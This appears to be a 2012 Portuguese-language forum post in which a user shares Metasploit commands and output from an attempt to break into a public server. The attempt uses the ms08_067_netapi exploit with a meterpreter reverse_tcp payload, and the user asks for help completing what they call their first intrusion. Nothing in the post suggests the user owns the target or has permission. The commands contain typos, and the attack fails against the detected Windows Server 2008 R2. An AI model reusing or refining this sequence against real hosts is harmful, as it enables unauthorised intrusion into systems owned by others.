lucasbarroso
(usa Ubuntu)
Enviado em 17/07/2012 - 02:49h
Fala galera precisso muito da ajuda de vocês no Backtrack
Bom eu fiz um escaner de rede no site ele apreseto portas abertas eu então eu executei o msfconsole
e tentei fazer a invasão com esses seguintes comandos:
use windows/smb/ms08_067_netapi
set playload windows/meterpreter/reverse_tcp
set rhost 174.142.93.226
set lohst meu < MEU IP>
Enviando o ataque exploit
Bom ai o resultado!!
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set playload windows/meterpreter/reverse_tcp
playload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set rhost 174.142.93.226
rhost => 174.142.93.226
msf exploit(ms08_067_netapi) > set rhost <AKI EU COLOQUEI MEU IP MAIS NÃO VO MOSTRA POR MEDIDAS DE SEGURANÇA>
rhost => 192.168.0.1
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on <MEU IP>:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows Server 2008 R2 Standard 7601 - Service Pack 1 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[-] Exploit exception: No matching target
[*] Exploit completed, but no session was created.
Bom acredito eu que estou bem perto da minha primeira invasão porque antes nem esse resultado eu conseguia!!
Podem me ajudar?